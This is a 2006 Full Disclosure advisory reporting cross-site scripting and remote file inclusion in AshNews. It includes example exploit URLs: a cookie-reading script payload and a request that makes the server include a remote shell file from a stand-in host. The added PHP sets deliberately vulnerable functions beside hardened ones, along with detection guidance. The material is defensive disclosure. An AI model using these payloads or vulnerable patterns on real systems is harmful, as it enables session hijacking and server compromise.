Full Disclosure mailing list archives
AshWebStudio AshNews Multiple Vulnerabilities
From: zeus olimpusklan <zeus.olimpusklan () gmail com>
Date: Wed, 1 Feb 2006 13:00:46 -0600
###########################################################################
# Advisory #7
# Title: AshWebStudio AshNews Multiple Vulnerabilities
#
# Author: 0o_zeus_o0
# Contact: zeus () diosdelared com
# Website: Security-mx.org
# Date: 01/02/2006
# Risk: High
# Vendor Url: http://dev.ashwebstudio.com/?section=ashnews
# Affected Software: AshWebStudio AshNews
# Non Affected:
#
# We Are: olimpus klan team
#
#Info:
#================================================================
#The cross-site scripting vulnerability allows session hijacking by
#stealing the user's cookie; this bug is in the file ashnews.php.
#There are also two high-severity bugs that allow remote file
#inclusion and command execution on the server. These are considered
#serious because they can lead to defacement of the site or theft of
#confidential information. They are in the files
#ashnews.php and ashheadlines.php.
#
#Example cross site scripting:
#================================================================
#
#http://example.com/[ashdirpath]/ashnews.php?page=showcomments&id=<script>alert(document.cookie);</script>
#
#Example Remote File Inclusion:
#================================================================
#http://example.com/[ashdirpath]/ashheadlines.php?pathtoashnews=http://www.example.com/shell.gif?
#
#http://www.example.com/[ashdirpath]/ashnews.php?pathtoashnews=http://www.example.com/shell.gif?
#
#Solution:
#================================================================
#
#Reported to the vendor and to security-mx.org.
#
#
#VULNERABLE VERSIONS
#================================================================
#ashnews v0.83. Other versions may also be affected.
#
#
#================================================================
#Contact information
#0o_zeus_o0
#zeus () diosdelared com
#www.Security-mx.org
#================================================================
#greetz: lady fire, Mi beba, olimpus klan team and all security-mx
##############################################################################
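The two bug classes in the advisory (a request-controlled include path, and a request parameter echoed back unescaped) are shown below as an added illustration written for this archive page; it is not AshNews's own code, and the function names, the `file` parameter and the idea that `id` is numeric are assumptions made for the example. The "vulnerable" functions mirror the pattern the advisory describes; the hardened ones show the fix a maintainer would apply: never derive an include path from the request, allowlist the filename, confine it to a server-side base directory, and validate plus HTML-escape anything reflected into the page.

```php
<?php
// Added example, not AshNews's code. Assumed: the scripts read their
// parameters from the query string (register_globals-era behaviour).

// ---- Vulnerable patterns, as the advisory describes them ----
function vulnerable_include_path(array $get): string {
    // pathtoashnews is taken straight from the request, so the include
    // target can be any URL or path the caller chooses (remote file inclusion).
    return $get['pathtoashnews'] . '/ashheadlines.php';
}

function vulnerable_render_id(array $get): string {
    // id is written into the HTML unescaped: reflected cross-site scripting.
    return '<h2>Comments for ' . $get['id'] . '</h2>';
}

// ---- Hardened forms ----
function safe_include_path(string $baseDir, array $get): string {
    // The base directory is configured server-side and never comes from
    // the request; only the filename varies, and it must be on an allowlist.
    $allowed = ['ashheadlines.php', 'ashnews.php'];
    $file = basename((string)($get['file'] ?? 'ashheadlines.php'));
    if (!in_array($file, $allowed, true)) {
        throw new InvalidArgumentException('unknown include: ' . $file);
    }
    // Resolve and confirm the result still lives inside $baseDir.
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $file);
    $base = realpath($baseDir);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include path is outside the base directory');
    }
    return $real;
}

function safe_render_id(array $get): string {
    // Validate the type (an article id is an integer) and escape on output.
    if (!isset($get['id']) || !ctype_digit((string)$get['id'])) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }
    $id = (int)$get['id'];
    return '<h2>Comments for ' . htmlspecialchars((string)$id, ENT_QUOTES, 'UTF-8') . '</h2>';
}

// ---- Demo with constructed inputs shaped like the advisory's examples ----
$xssRequest = ['page' => 'showcomments', 'id' => '<script>alert(document.cookie);</script>'];
$rfiRequest = ['pathtoashnews' => 'http://www.example.com/shell.gif?'];

echo vulnerable_render_id($xssRequest), "\n";    // the script tag is emitted as-is
echo vulnerable_include_path($rfiRequest), "\n"; // include target is caller-controlled

try {
    safe_render_id($xssRequest);
} catch (InvalidArgumentException $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
try {
    safe_include_path(__DIR__, ['file' => 'http://www.example.com/shell.gif?']);
} catch (Exception $e) {
    echo "blocked: ", $e->getMessage(), "\n";
}
echo safe_render_id(['id' => '42']), "\n";       // <h2>Comments for 42</h2>
```

Alongside the code change, a defender would also set `allow_url_include = Off` (and, where the application does not need it, `allow_url_fopen = Off`) in php.ini so that a stray `include` of a URL fails at the interpreter level, and would look in the web server's access log for requests to ashnews.php or ashheadlines.php whose `pathtoashnews` or `id` parameter contains `http://`, `<script`, or similar, since those are the exact shapes the advisory's examples take.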
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/